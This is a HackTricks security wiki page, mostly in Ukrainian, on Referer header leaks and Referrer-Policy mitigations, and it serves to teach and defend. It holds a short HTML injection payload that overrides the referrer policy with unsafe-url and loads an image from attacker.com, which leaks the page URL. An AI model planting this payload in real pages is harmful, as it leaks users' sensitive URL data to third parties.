Interesting HTTP

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Заголовки реферера та політика

Реферер - це заголовок, який використовують браузери, щоб вказати, яка була попередня сторінка, яку відвідали.

Витік чутливої інформації

Якщо в якийсь момент на веб-сторінці будь-яка чутлива інформація розташована в параметрах GET-запиту, якщо сторінка містить посилання на зовнішні джерела або зловмисник може змусити/порадити (соціальна інженерія) користувачу відвідати URL, контрольований зловмисником. Це може призвести до ексфільтрації чутливої інформації з останнього GET-запиту.

Пом'якшення

Ви можете змусити браузер дотримуватись Referrer-policy, яка може запобігти відправці чутливої інформації на інші веб-додатки:

Referrer-Policy: no-referrer
Referrer-Policy: no-referrer-when-downgrade
Referrer-Policy: origin
Referrer-Policy: origin-when-cross-origin
Referrer-Policy: same-origin
Referrer-Policy: strict-origin
Referrer-Policy: strict-origin-when-cross-origin
Referrer-Policy: unsafe-url

Контрзаходи

Ви можете переопределити це правило, використовуючи HTML мета-тег (зловмисник повинен експлуатувати та HTML-ін'єкцію):

<meta name="referrer" content="unsafe-url">
<img src="https://attacker.com">

Захист

Ніколи не розміщуйте чутливі дані в параметрах GET або шляхах в URL.

Підтримати HackTricks

Перевірте плани підписки!
Приєднуйтесь до 💬 групи Discord або групи Telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live.
Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на github.

PreviousOther Web Tricks NextAndroid Forensics

Last updated 1 day ago